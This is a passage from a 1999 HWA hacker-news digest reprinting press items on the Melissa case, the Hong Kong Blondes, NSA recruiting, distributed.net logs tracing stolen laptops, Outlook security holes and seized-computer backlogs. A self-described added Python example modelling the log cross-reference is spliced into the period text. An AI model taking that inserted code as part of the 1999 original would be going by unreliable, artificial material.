Defense lawyer Edward P. Borden Jr. told the Asbury Park Press of Neptune that he disputes Bubb's assertions. He refused to comment further, the newspaper reported today.

The Melissa virus was disguised as an e-mail marked "important message" from a friend or colleague of each recipient. It caused affected computers to create and send 50 additional infected messages. The volume of messages generated slowed some systems to a crawl.

Authorities say the virus was named after a topless dancer in Florida.

Bubb's brief was filed in response to a defense motion seeking additional prosecution documents.
Borden says he needs the prosecution documents to file a motion to suppress evidence seized during the search of Smith's apartment. A hearing on his motion was to be held Wednesday afternoon.

Smith is charged with interruption of public communications, conspiracy and theft of computer service. The maximum penalty for the offense is 40 years in prison. He remains free on $100,000 bail.

@HWA

24.0 cDc Responds to Allegations About HKBs
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

Oxblood Ruffin, from the Cult of the Dead Cow, gives an interview about the existence of the Hong Kong Blondes. The HKBs are a group of Chinese dissidents who are trying to destabilize the Chinese Government through the Internet. Last week a report was issued that there was no evidence to support their existence and concluded that therefore they must not exist.

IT Daily
http://www.itdaily.com/daily.lasso?-database=dailybasepublic&-layout=today&-response=itdailyfree.htm&-recid=39830&-search

Thursday, August 25, 1999

Cult claims Hong Kong hackers are real threat

US hackers respond to itdaily.com story

By Neil Taylor

Leading US hacker group the Cult of the Dead Cow has told itdaily.com that elusive Chinese hackers the Hong Kong Blondes are operating in Asia.

According to the CDC, the Blondes are a group of Chinese dissidents who aim to destabilise the Chinese Government through the Internet. Along with an offshoot named the Yellow Pages, the group threatened to use information warfare to attack China's information infrastructure. The group threatened to attack both Chinese state-owned organisations and Western companies investing in the country.

When the group was first reported, the CDC claimed to be training the Blondes in encryption and intrusion techniques.

A recent investigation by itdaily.com found no evidence of the group's existence.
Despite approaching the Hong Kong ISP Association, the Hong Kong Government, Police, universities, security experts and hackers alike, nobody contacted by itdaily.com knew anything about the group.

However, CDC foreign minister OXblood Ruffin told itdaily.com that the Hong Kong Blondes are for real, and that they are operating in Asia. The chief organisers, nicknamed Blondie Wong and Lemon Li, were last reported to be based in India.

"The Blondes do exist, although the CDC has truncated our official relationship with them," said Ruffin. "The Yellow Pages on the other hand briefly existed but were shut down by me."

Ruffin said that the reason the group has been so low-key is that they operate secretly to avoid compromising members in China. "They're hyper secure. They're organised in cells of three members with no one but Blondie and Lemon knowing the entire membership."

The CDC has portrayed the Hong Kong Blondes as "hacktivists", meaning they break into computer networks for political ends.

"The Yellow Pages got together and they were gonna do support work to draw attention to social justice issues in China linked to current trading practices on the Western side..."

Ruffin said that he later learned that the group planned to shut down the networks of a number of large US corporations, at which point he decided to disband the group and disassociate himself from the Hong Kong Blondes.

"The American public would not have supported any such adventure and it would have worked seriously against the cause," he said. He added that the CDC no longer maintains any relationship with the group.

As previously reported in itdaily.com, the first and only Hong Kong Blondes interview was leaked to the press by the CDC just one month before the group released its well-known remote administration tool Back Orifice. BO can be installed on a Windows PC without the user's knowledge, giving full control over the machine to unauthorised third parties.
Since then, Back Orifice has become widespread internationally, particularly in China.

There is still no evidence beyond the word of OXblood Ruffin that the Hong Kong Blondes do, in fact, exist, but as Ruffin's e-mail signature notes: "First we take the networks, then we take Peking."

@HWA

25.0 $50G Offered in 'Hacker Challenge' Publicity Stunt
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Yazmon

Global Markets Research (GMR), a UK company, has offered $50,000 (US) to anyone who can break their proprietary email system within three months. The company designed 1on1 e-mail "to guarantee complete confidentiality"; the program uses 2048 bit encryption while email is in transit and can autodelete email after it has been read.

BBC
http://news.bbc.co.uk/hi/english/sci/tech/newsid_430000/430084.stm

1 on 1 Mail
http://1on1mail.com

HNN has stated its feelings about these 'Hacker Challenges' before. These should not be considered adequate testing methods. Reasons: 1) Most people with the knowledge to break systems like this are busy making bigger money elsewhere, 2) The real bad guys don't want to give away their secrets, 3) this is not a controlled environment conducive to good research. If companies want publicity and a good test of their security then they should hire someone like NMRC, Phar Lap, L0pht, eEye, or any other independent third party security experts to review their software.

NMRC.....: http://www.nmrc.org
Phar Lap.: http://www.pharlap.com/
L0pht....: http://www.l0pht.com
eEye.....: http://www.eeye.com/

BBC:

Thursday, August 26, 1999 Published at 08:15 GMT 09:15 UK

Sci/Tech

The self-destructing e-mail

Providing secure e-mail is a growing business

A new program can send e-mail messages which self-destruct after a set time. Its developers claim this will protect senders from having ill-judged electronic words used against them later.
The most high-profile instance came last year when Microsoft's Bill Gates had to defend himself against his own e-mails in a US antitrust case.

Hack it if you can

UK company Global Markets Research (GMR) designed 1on1 e-mail "to guarantee complete confidentiality". It uses 2,048-bit public key encryption to secure the message in transit, and GMR have such confidence in it that they are offering $50,000 to anyone who can hack into a message within three months.

The self-destruct feature is called autoshredder, and the package also prevents recipients from just cutting and pasting out of it. "That would be pointless," GMR's technical director, Steven James, told New Scientist magazine.

1on1mail also ensures that the e-mail is not stored anywhere on the recipient's computer. Finally, when the message self-destructs, it is overwritten on the disk, so it cannot be undeleted later.

Gimmick jibe

However, critics have been quick to give their views. "2,048-bit encryption is ridiculous," cryptographer Bruce Schneier told technical news Website ZDNN. "It is irrelevant. The security is determined by the password anyway. If the user picks a bad one, the security is bad."

Hushmail, a rival encrypted e-mail service, dismissed the self-destruct feature as a gimmick.

Another fear is that e-mails used to send viruses or trojans could destroy themselves along with any evidence.

@HWA

26.0 NSA Recruiting In the Underground
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Ender

The National Security Agency has been actively recruiting at least one member of the underground community. Ender Wiggin, editor of the OSAll web site, has received offers for free tuition to a four year college, salary, and room and board, in exchange for working for the NSA for five years after graduation. After noticing the NSA was visiting his web site he sent an inquiring email and then received the offer to join this program.
OSALL - NSA and Kids
http://www.aviary-mag.com/News/NSA_and_Kids/nsa_and_kids.html

OSALL - Ender and CNN
http://www.aviary-mag.com/News/CNN/cnn.html

The NSA is actively recruiting high school kids, offering to pay for college -- and a salary to boot.

The NSA and Kids
Mike Hudack
Editor-in-Chief

They were visiting the Web site daily. Every day they downloaded all the new files and left. Who were they? The National Security Agency.

The NSA was created in the fifties with a mandate to read other nations' mail and keep our mail from being read. Since then they've moved into computer security in addition to their original cryptology.

Curious, I sent an e-mail to the registered custodian of the address visiting the site. It must have been referred around the mulberry bush because someone else answered. "Do you know about our college programs?" this new person asked... I didn't.

Apparently the NSA actively recruits students in high school (only local to Fort Meade) and college. The NSA employee asked for my address and received it. About two weeks later I received a hand-addressed manila envelope (which has been broadcast on CNN) containing a series of glossy recruitment brochures touting an "opportunity the brightest students cannot afford to miss."

They had no idea about my academic qualifications when they told me about the program -- or at least I didn't tell them. My academic credentials are, however, quite good with the exception of attendance.

About a week after I received the brochures I received another e-mail from this NSA employee who I was now recognizing as a recruiting officer. He told me that I could "definitely get into the program," and that I would be able to go to "any college [I] want," suggesting they could get me into the colleges. Since then he's e-mailed me almost weekly asking if I've applied.

This happened to me almost half a year ago now, and I've since spoken to others who have been the subject of recruiting efforts.
One teenager told me "they were very enthusiastic. Kept telling me how I could get paid for going to college... They sounded like the Army." And well they should -- they are part of the Department of Defense.

The offer is pretty simple, and anyone can apply. If you plan to study computer science, electrical or computer engineering, mathematics or language in college, the NSA will allow you to apply. You must have at least a 1200 on your SATs and a 3.0 GPA. In return for four years of college, a salary, room and board, you must work for the NSA for five years post-graduation.

Most of the people the NSA is targeting in this recruiting program seem to have problems with the idea. Most, including me, disagree with the NSA's cryptology policies (read: key escrow and export limitations). Likewise, however, the opportunity is certainly an amazing one.

Related Links:

National Security Agency
http://www.nsa.gov

NSA Names Schools
http://www.aviary-mag.com/News/Old_News/NSA_Colleges/nsa_colleges.html

Ender & CNN
Mike Hudack
Editor-in-Chief

Mike Hudack, aka Ender Wiggin, editor of OSAll, was profiled on the Cable News Network beginning on Monday. The entire profile will run on Saturday on CNN at 1:30pm eastern time.

The story focuses on the fact that I've been actively recruited by the National Security Agency. To find out more about it you'll have to watch :-)

A segment of the story originally ran on CNN Headline News on Monday, repeating every half hour. Subsequently it ran on CNN World Today at 10pm eastern. It ran again on CNN's morning show on Tuesday morning.

The idea behind the story is to make a positive impact on the media and public's understanding of hackers. It is meant to "break the hacker stereotype." As a CNN anchor said, you "may remember the movie War Games. Now the government is remaking the image of hackers."

I will be interviewed by FOX News on Wednesday night to air on Labor Day Weekend.
The focus of the FOX story will be similar -- with a focus on breaking the hacker stereotype and emphasizing the positive side of hackers. Likewise, I have been in discussions with an NBC channel for a similar story.

I've previously been quoted or pictured in magazines such as US News & World Report and PC World on security subjects. The US News article was likewise focused on changing the attitude about hackers.

Since the CNN story started running I've been swamped by hundreds of e-mails from everyone from venture capitalists to former NSA employees. All have been very supportive, and I thank them very much.

Related Links:

OSAll BBSystem
http://www.aviary-mag.com/bbsystem

National Security Agency
http://www.nsa.gov

Cable News Network
http://www.cnn.com

CNN Transcript of Partial Segment
http://cnn.com/TRANSCRIPTS/9908/23/wt.06.html

FOX News Network
http://www.foxnews.com

NBC
http://www.nbc.com

US News & World Report
http://www.usnews.com

PC World Magazine
http://www.pcworld.com

Transcript: World Today

Teenage Hacker Gets Attention of NSA

Aired August 23, 1999 - 10:51 p.m. ET

THIS IS A RUSH TRANSCRIPT. THIS COPY MAY NOT BE IN ITS FINAL FORM AND MAY BE UPDATED.

JOIE CHEN, CNN ANCHOR: Perhaps you'll remember the movie "War Games," which told the story of a cyberwhiz who was pursued by the Pentagon and CIA because of his hacking activities. Now some parallels in the life of a real-life teen now being targeted by a key security agency. The details from CNN's Ann Kellan.

(BEGIN VIDEOTAPE)

ANN KELLAN, CNN CORRESPONDENT (voice-over): He's your typical teenager -- hangs out with friends, loves pizza, argues with his parents that he really is old enough to drive. So why would the government's top-secret national security agency, the NSA, be interested in Mike Hudak? This 16-year-old is a computer whiz kid, a hacker.

MIKE HUDAK III, COMPUTER HACKER: Most hackers are not malicious. They're good people.
KELLAN: Mike was 12 when he bought his first computer and immediately, and legally, hacked it.

HUDAK: One of the first things I did with it is I took it apart and then put it back together. And I was praying, you know, and it worked.

KELLAN: He even set up his own hacker news Web site. The NSA noticed it.

HUDAK: They visited my site every day, and I can tell from site logs. So I e-mailed them, and they e-mailed me back, telling me about their recruitment program.

KELLAN: The NSA wouldn't comment on camera, but off-camera says it recruits students like Mike and will pay four years college tuition, room and board, even pay a salary. In exchange, students work summers and at least five years after college for the NSA.

HUDAK: Don't use all caps. Turn off caps lock.

KELLAN: It's tempting for someone like Mike, who babysits every day after school and during the summer to make a buck. But then he wonders if he can work for the NSA when he disagrees with some of its policies.

HUDAK: I would have to think long and hard before I did it.

KELLAN: Not your typical computer hacker stereotype.

HUDAK: This made it into the dictionary this year.

KELLAN: Mike's parents are proud of his accomplishments, but dad wants Mike to be a doctor.

MIKE HUDAK II, MIKE'S FATHER: I love what he's doing now, but I think with his ability he could be a hell of a surgeon.

HUDAK: No, I've always -- the sight of blood has always made me weak in the knees.

KELLAN: Mike, at 16, wants a career where fun and money go hand in hand. Ann Kellan, CNN, Fairfield, Connecticut.

(END VIDEOTAPE)

-=-

http://cnn.com/TECH/computing/9908/26/t_t/teen.hacker/index.html

Federal agency recruits hacker teens

August 26, 1999
Web posted at: 11:21 a.m. EDT (1521 GMT)

FAIRFIELD, Connecticut (CNN) -- What image comes to mind when you hear the word hacker?
If it's someone evil or malicious, somebody breaking into computers illegally, you're only partly right.

For instance, Mike Hudack is your typical teenager. He hangs out with friends, loves pizza and argues with his parents that he really is old enough to drive. So why would the National Security Agency be interested in him? Because this 16-year-old is a computer whiz, a hacker.

"Not every hacker, not everyone who calls themselves a hacker, is a bad person," Mike says. "Most hackers are not malicious. They are good people."

Mike was 12 years old when he bought his first computer.

"And I took it home, and I loved it so much," Mike says. "One of the first things I did with it is I took it apart and then put it back together."

He even set up his own hacker news Web site, offering security advice to government agencies. That is how he got the NSA's attention.

"They visited my site every day and I e-mailed them, they e-mailed me back, telling me about their recruitment program," Mike says.

The NSA says it recruits students like Mike and will pay four years of college tuition, room and board and even a salary. In exchange, students work summers and at least five years after college for the NSA.

It's tempting for someone like Mike who baby-sits every day after school and during the summer to make a buck. But he wonders if he can work for the NSA, given that he disagrees with some of its policies.

"I would have to think long and hard before I did it," Mike says.

@HWA

27.0 Distributed.net Fingers Thief
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

On two separate occasions stolen laptops were recovered with the help of the distributed.net RC5 client. The idiotic thieves did not reformat the hard drives of the stolen systems like they should have and instead started using them on the internet with the original software installed.
Distributed.net was then able to match the original email address from the clients with the machines' new IP numbers to trace the thieves.

Wired
http://www.wired.com/news/news/technology/story/21431.html

Not everyone thinks this is a good thing. Some feel that Distributed.net erred by giving out its web logs without a warrant.

MindSec
http://www.mindsec.com/misc/distnet.html

Wired;

Net Address Helps Finger Felons
by Andy Patrizio

2:00 p.m. 25.Aug.99.PDT

Running the RC5 client on your computer is not only a nifty way to win a few thousand dollars, it could also help find your PC if it is stolen.

The RC5 client is used in a contest where people put their PCs to work in an attempt to break RSA Data Securities' 64-bit encryption. On two occasions, computers running the RC5 client were stolen, but the crooks were caught because they didn't realize that the computers could be traced.

RSA, a leading developer of data encryption, issued a US$10,000 challenge two years ago to break its 64-bit encryption security. There are 18 quintillion key possibilities with 64-bit encryption, and after two years and 197,000 participants, only 11.8 percent of the keys have been tested.

RC5 runs during idle CPU cycles. It periodically connects to Distributed.net servers to return processed encryption keys and to retrieve new ones.

When the thieves started to use the computers, RC5 continued to process keys and connect to Distributed.net servers, sending in completed work and fetching new keys. And when the stolen computer communicated with the server, it logged in using the thief's IP address.

The Distributed.net administrators tracked the IP address back to the thieves' ISPs, and in turn were able to determine who was using that IP address when the keys were sent.

In separate incidents, in May 1998 in Sweden, and this year at Oregon State University in Corvallis, Oregon, police were able to recover the computers, said David McNett, a programmer who runs Distributed.net.
"We have a joke in the admin channel that Distributed.net is like LoJack for your computer." LoJack is a device placed in cars that allows police to determine their location if the vehicles are stolen.

"It's certainly an unanticipated side effect of running the client, but a good one."

The other side of the coin

Mindsec;

Wired News Article
http://www.wired.com/news/news/technology/story/21431.html

Mindsec.com has noted that services like distributed.net and Seti@home let you have a background client running, which will periodically send in your finished blocks, or some data that they are processing, as well as the IP you came from and your email address. It sends the email address you provide to it for statistics and tracking purposes. When that is done, bound to your IP address, it effectively lets them see where you are coming from. Well, that is not a problem, that is fine. Except when two things happen. The first would be when distributed.net, without being served a warrant, just gives logs to a regular person who wants them. It is great that the person got their stolen computer back, and the person who stole it was arrested; however it should have gone through legal channels, and they should have been served a warrant.

The second: what if they are served a warrant to track someone? Well, there is nothing you can do about that, except to use a fake email address, or an account that you never access from anywhere else, and use a proxy server to connect to them. If you just use a fake email account, and use it ONLY with distributed.net, you would be OK, since there is no way someone would know what that account is. However if someone found it, poof, you have been tracked.

These are things you should keep in mind; they are important and serious. They are a big part of computer privacy, and Mindsec.com fully supports Computer Privacy, and Privacy in general.
When we spoke to the administrative contact at distributed.net, he said that they gave out the logs just to help them out. He also stated "The logs are no different than any web server that logs your IP". I corrected him in the fact that web servers do not cross reference to a database of email addresses. I am sure they meant no harm, and I hope they will realize that this is bad and never do it again. They were contacted by the people who had their computers stolen, and they did the research for them. It is unclear if it was distributed.net who spoke to the ISP of the thief, or if it was turned over to the police first.

Late Addition:

Just to clarify to the people who are mailing and saying that they don't see the problem. Go sign up to be on distributed.net. What authentication does it do to find out who you are? None, so how can someone go after the fact and try to say "Well that is me". I am sure I could say "I am Joe Johnson, my laptop got stolen, this is my email address, could you give me the logs?". If distributed.net even asked for any kind of verification of who they were, besides their email address, and sending email to the same account that the rc5 client was using, how is that secure verification? If "Hacker X" wanted to track down "Hacker B", they hack that person's account, and if that was already enough to track them, they could find them in almost real time, to their IP address, thanks to distributed.net.

I like the idea behind distributed computing; most people like the idea. But the way it logs and such is serious; it either needs real verification, via PGP of some sort... I would say they need to just not give out their logs without a warrant, but nobody can trust them after this.
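The log cross-reference that Wired describes and Mindsec objects to, modelled as an added example (this is not code from HWA, distributed.net or Mindsec); the log format, e-mail addresses, IPs and timestamps are constructed sample data, and the point it shows is that the e-mail string alone is the lookup key:

```python
# Added example, not code from HWA, distributed.net or Mindsec: a small model of
# the log cross-reference the Wired and Mindsec pieces describe. The client
# reports finished keys tagged with the user's e-mail address, and the server
# records the source IP of each check-in, so a lookup keyed on the e-mail
# address alone yields a location history for that machine. The log format and
# all addresses below are constructed sample data, not real distributed.net logs.
from datetime import datetime

# Constructed check-in log (format assumed):
# "<ISO timestamp> <e-mail> <source IP> <blocks returned>"
SAMPLE_LOG = """\
1999-05-02T08:14:00 owner@example.net 192.0.2.10 12
1999-05-03T08:20:00 owner@example.net 192.0.2.10 11
1999-05-04T09:02:00 owner@example.net 192.0.2.10 13
1999-05-03T10:00:00 other@example.org 203.0.113.5 8
1999-05-09T22:41:00 owner@example.net 198.51.100.77 9
1999-05-10T23:05:00 owner@example.net 198.51.100.77 10
"""


def parse_log(text):
    """Parse the check-in log into (timestamp, email, ip, blocks) tuples."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, email, ip, blocks = line.split()
        records.append((datetime.fromisoformat(ts), email.lower(), ip, int(blocks)))
    return records


def ip_history(records, email):
    """Every source IP an e-mail address has checked in from, oldest first,
    as (ip, first_seen, last_seen). Nothing but the e-mail string is needed
    to run this query, which is the verification gap Mindsec points out."""
    seen = {}
    for ts, addr, ip, _ in sorted(records):
        if addr != email.lower():
            continue
        if ip in seen:
            seen[ip][1] = ts
        else:
            seen[ip] = [ts, ts]
    return [(ip, first, last)
            for ip, (first, last) in sorted(seen.items(), key=lambda kv: kv[1][0])]


def location_changes(records, email, stolen_after=None):
    """(timestamp, old_ip, new_ip) for each check-in from a new IP. With
    stolen_after set, only changes at or after the reported theft are kept:
    a new IP plus a timestamp is what an ISP can resolve to a subscriber,
    which is how the two stolen machines in the article were traced."""
    changes = []
    last_ip = None
    for ts, addr, ip, _ in sorted(records):
        if addr != email.lower():
            continue
        if last_ip is not None and ip != last_ip:
            if stolen_after is None or ts >= stolen_after:
                changes.append((ts, last_ip, ip))
        last_ip = ip
    return changes


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    for ip, first, last in ip_history(recs, "owner@example.net"):
        print(f"{ip:15} {first.isoformat()} .. {last.isoformat()}")
    for ts, old, new in location_changes(recs, "owner@example.net"):
        print(f"{ts.isoformat()}: moved from {old} to {new}")
```

A client registered under a throwaway address used nowhere else, as Mindsec suggests, produces the same history but under a key nobody can tie to a person unless that address leaks.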
@HWA

28.0 Hacktivism Email List
~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by grugnog

An email list to discuss news about recent hactivists events and analysis about hacktivism and for discussion possibly leading to a better understanding of what 'hacktivism' means (as a word and in a tactical, ethical and practical sense).

Hacktivism list
http://www.tao.ca/~grugnog/hacktivism/

@HWA

29.0 Mitnick in Car Accident
~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by maverick212

While being transported from the San Bernardino Jail to the Los Angeles Metropolitan Detention Center the vehicle Kevin Mitnick was riding in was involved in a multi car pile up. The accident occurred on Highway 60 between 8:30 and 9 a.m. Kevin was thrown against a metal divider within the vehicle and suffered minor head and neck injuries. Although Kevin and the other prisoners were shackled in chains no seat belts were used. After the accident Kevin was transported back to the San Bernardino Jail.

FREE KEVIN
http://www.freekevin.com/

Wired
http://www.wired.com/news/news/politics/story/21455.html

Mitnick Hurt in Car Crash
by Douglas Thomas

4:30 p.m. 26.Aug.99.PDT

LOS ANGELES -- Convicted hacker Kevin Mitnick sustained minor head and neck injuries Wednesday morning in a multi-car accident while he was being transferred to a facility that satisfied his dietary requirements.

Mitnick, being transferred in anticipation of a court ruling which would order Mitnick moved to a facility that served kosher meals, was thrown against a metal divider.

Mitnick and an unknown number of other inmates -- shackled in chains but with no safety restraining devices -- were being transported from the San Bernardino Jail to the Los Angeles Metropolitan Detention Center. The crash occurred on Highway 60 between 8:30 and 9 a.m.
"I really slammed my head when I hit the metal divider," Mitnick said in a telephone interview on Thursday. X-rays proved negative, although Mitnick continues to complain of headaches, nausea, and shoulder and neck pain.

Insult soon added to his injuries: After spending several hours waiting to be admitted to the MDC, Mitnick was transferred back to the San Bernardino facility, which does not serve kosher food. Mitnick wound up spending most of Wednesday night waiting on the floor of a holding cell to be readmitted. He was finally booked into the facility at 3:30 a.m. Thursday.

Mitnick said he has yet to be seen by a San Bernardino facility nurse, and has had no access to any painkiller, including Tylenol.

"I don't think they have any idea what happened," Mitnick said, referring to the lack of medical attention.

Although unwilling to comment on legal action regarding the accident, Mitnick's attorneys did say that they immediately sent a letter to the U.S. Marshals Service requesting that Mitnick be moved to a federal facility. They say a federal facility could provide him access to kosher food and to medical treatments in keeping with federal guidelines. U.S. Marshals were unavailable for comment.

"This has definitely been one of the worst days in custody," Mitnick said.

(If that was his worst day he's been doing alright, no one has made him their girlfriend yet ... - Ed)

@HWA

30.0 Hong Kong Police Create Computer Crime Squad
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Code Kid

The Hong Kong Police have announced plans to form the Computer Crime Investigation Cadre to help tackle computer crime at district levels. Members of the squad will be selected from an officer training course being run by the Commercial Crime Bureau.
South China Morning Post
http://www.technologypost.com/enterprise/Daily/19990826112510135.asp?Section=Main

Published on Thursday, August 26, 1999

ENTERPRISE

HK police to establish computer crime team

NEWSBYTES

The Hong Kong police yesterday announced plans to form a special team of officers with expert knowledge in the area of computer crime to help battle criminals that are increasingly turning to electronic means to commit crimes.

The new squad will consist of an unspecified number of officers who will be called in to help colleagues when criminals employ sophisticated computer techniques in committing their crimes.

"The surge in computer use, the increase of related criminal cases and other emerging issues in various regions over the past year have resulted in a challenge which the 17 members of the section now find it difficult to cope with, without resorting to help from their Force colleagues," explained Commercial Crime Bureau Chief Superintendent, Victor Lo Yik-kee.

"That is what Cadre members will be for," added Mr Lo. "Once qualified and recognised, they can help provide support services to their own formations in handling cases of computer-related crimes while officers of the Section can continue to play the role of a co-ordinator and provide assistance when needed."

The first members of the squad are expected to be recruited by September.

The Commercial Crime Bureau is already running a training course for officers from across the force, said the force, and this course is being used to select members of the new Computer Crime Investigation Cadre which will help tackle computer crime at District levels.

The training course follows a similar two day meeting at the Police Training School in July when over 180 officers of different ranks and members of the Immigration Department and the Customs and Excise Department attended seminars on computer crime and undertook a written test to judge their knowledge of the subject.
Copyright (c) Post-Newsweek Business Information, Inc. All rights reserved.

@HWA

31.0 Outlook Holes Demonstrated at USENIX
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond

Richard Smith, president of Phar Lap Software, recently gave a presentation at the 8th Usenix Security Symposium detailing over a dozen major holes in Windows Outlook. Some holes would give infocriminals complete access to your desktop computer.

Wired
http://www.wired.com/news/print_version/business/story/21442.html?wnpg=all

Locking Windows' Backdoors
by Declan McCullagh

3:00 a.m. 26.Aug.99.PDT

WASHINGTON, DC -- If you use Microsoft Outlook, be warned. Over a dozen bugs in Windows 98 let malicious virus writers and meddlesome peeping Toms view or erase any file on your hard drive.

At a computer security conference Wednesday afternoon, an expert demonstrated how malcontents can send apparently innocuous email with hidden commands that -- if opened using certain email programs -- will give an intruder complete access to a Windows computer.

"We've got some serious problems here, folks. We've got some really bad backdoors on the computers we have on our desktops," said Richard Smith, president of Cambridge, Massachusetts-based Phar Lap Software, who identified the person accused of writing the Melissa virus.

During his presentation at the 8th Usenix Security Symposium, Smith demonstrated some new security flaws he and his collaborators have identified in their spare time. One recently unearthed and not-yet-fixed Win98 glitch lets an email opened in Outlook execute any DOS command -- including reformatting your hard drive or uploading its contents to a remote Web site.

The solution? Consumers could switch to a non-Microsoft operating system. Another option, Smith suggested, is for customers to begin asking computer companies to turn off features that let email messages execute other programs.
"It's prudent to avoid systems in which we can have executable content," said Peter Neumann, the conference's keynote speaker and a researcher at SRI International. "There is no way you can have any assurance whatsoever that it will work."

Many of the problems security experts have identified stem from the design choices Microsoft made when developing Windows 95 and 98, which are much more vulnerable to intrusions than Linux, Unix, or even Macintosh systems.

One gaping security hole is Microsoft's complicated ActiveX technology, which lets remote Web pages or email messages execute programs that manufacturers claim are trustworthy. But sometimes they're not. With a little programming, a nefarious person can send email or create a Web page that activates Active X functions that delete files, modify them, or even send their contents to any address on the Internet.

As security experts have identified these flaws, Microsoft has tried to fix them, and Smith said some have been eliminated from early versions of Windows 2000. But the millions of people using current versions of Windows 98 and Outlook are still at risk, he said, unless they switch off ActiveX.

Not only Microsoft is to blame. Netscape has acknowledged security glitches in its browser. Unrepaired versions of Qualcomm's Eudora 4 let executable programs masquerade as links.

Computer makers, too, have been shipping buggy software. Hewlett Packard has included two ActiveX controls on about 5 million Pavilion computers, Smith said, that let HTML email messages opened in Outlook or Eudora take control of the computer. An intruder can silently insert a virus, disable security features, view documents, or crash the system.

Some Compaq Presario computers suffer from a similar security risk. As configured from the factory, the computers trust all applications provided by Compaq -- one of which can execute whatever program an email message orders it to run.
"Compaq gave every hacker in the world a way to run programs," Smith said.

To improve the security of Outlook, go to the Security tab in the program's Options dialog box and select "restricted sites zone." Then, in the Internet Options Windows control panel, go to "Restricted sites/Custom level" and scroll down and disable "Active Scripting."

@HWA

32.0 Feds Overflowing with Seized Equipment
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by netmask

Hundreds of computer systems are piling up and cases are going untried because the FBI lacks the resources to examine confiscated equipment. Under federal law investigators may keep property seized as possible evidence until the statute of limitation for the given crime expires, generally five years for computer crime cases.

New York Times- Registration Required
http://www.nytimes.com/library/tech/99/08/cyber/cyberlaw/27law.html

Investigators Face a Glut of Confiscated Computers

By MATT RICHTEL

When the FBI raided the family home of Paul Maidman, 18, in late May, they seized his computer as possible evidence of online criminal activity and took it to a high-tech forensics lab in Dallas. The Waldwick, N.J., teenager, who has yet to be arrested or charged with a crime, is concerned that it could take a long time to learn his fate -- and that of his computer.

The FBI and prosecutors on cases like Maidman's say he could be waiting a while.

Maidman is one of hundreds of people whose computers are in federal and state custody. Law enforcement officials say they lack the time, resources and sometimes expertise to examine all of the PCs that are piling up.

For example, at the headquarters of a federal cybercrime task force in Dallas, more than 100 hard drives await examination, but only three forensics experts are available to look at them, said Paul E. Coggins, the United States Attorney in Dallas.
The computers were seized in cases involving a range of alleged crimes, including fraud, embezzlement, child pornography and computer break-ins.

"We've had hackers who are ready to plead guilty, but we're slowed down because we lack the resources" to scour through the evidence, Coggins said, adding that few forensics agents have been trained to find and understand incriminating data on hard drives.

"It's hard to find people to begin with who not only have the interest but the competence," he said.

It is unclear how widespread this problem is among state and federal agencies. But Coggins said that numerous agencies, both state and federal, seek the advice and assistance of the three forensics investigators in Dallas, suggesting there is insufficient expertise in many jurisdictions.

"We are desperate for resources to process these cases," said Matthew E. Yarbrough, an assistant United States Attorney based in Dallas who is one of 25 federal prosecutors assigned by Congress to pursue cybercrime cases full-time.

Supporters of hackers and the hacker ethos, which champions non-malicious computer tinkering, say the situation is worrisome. They fear that computer users who are innocent, or who may never be charged with a crime, may be deprived of thousands of dollars worth of equipment far longer than necessary.

As evidence, they point to a recent study by a senior fellow at the Electronic Privacy Information Center which found the prosecution rate for computer crime to be lower than that for other types of crime. That suggests to critics that investigators are unfairly targeting innocent people.

Federal law enforcement officials counter that, in part because of the complexity of evidence gathering, the computer crimes are complicated to prosecute.

When it comes to holding confiscated property, the investigators have the law on their side.
Under federal law, they may keep property seized as possible evidence until the statute of limitation for the given crime expires -- with non-capital offenses, generally five years after the crime is committed.

Defense lawyers concede it is not unusual for law enforcement to keep property as possible evidence in an ongoing investigation for several years.

"It's not abnormal, but it is a big deal for the innocent person whose expensive equipment is taken from them," said Jennifer S. Granick, a San Francisco lawyer who represents hackers.

"Whether the seizure of the property is justified, we can't know now," she said. "But in time, when the affidavits are unsealed, then we'll know whether there was good cause or sound reason to deprive these people, or whether the seizures are part of anti-hacker hysteria."

The issue dates back to a debate in 1990 over a government investigation called "Operation Sun Devil," targeting members of the Legion of Doom, a hacker group. As part of the investigation, agents confiscated computers at Steve Jackson Games, a small company in Austin, Tex., in search of a rule book for a game. Investigators thought the book might be a how-to guide for computer criminals.

Without his computers, Jackson was nearly forced out of business. He took the Secret Service to court and won on two of three counts, forcing the Secret Service to pay more than $300,000 in damages and legal fees.

Today, federal investigators say they make an effort to return computers to a business whose equipment may have been used by an employee without its knowledge, or machines that are needed to keep a legitimate business in operation. One way investigators accomplish this is by taking a snapshot of the hard drive, copying all of the data and then returning the original to its owner.

But Yarbrough, the assistant United States Attorney, said returning personal computers to people suspected of wrongdoing is another matter.
He said their computers may be instruments used in a crime, and would not be returned any more than a gun would in a similar situation. Yarbrough said that it is not a valid use of limited government resources to spend time copying the hard drives of a suspect's computer just to be able to return it to them.

"We don't give the gun back to a bad guy, and we don't give the computer back to a bad guy," he said.

But Ms. Granick disagreed, arguing that while it is necessary to hold a gun as evidence, hard drives are different.

"You can't copy the gun and have it be good evidence in court. You need to have the actual gun," she said.

Hackers and others are allowed under federal law to petition the government to return their property. But some say they worry that if they do so, they risk irritating investigators and making things harder on themselves.

"I don't want to make any problems," said Maidman, the 18-year-old from New Jersey. "I'd really like my stuff back, but I don't want to upset them."

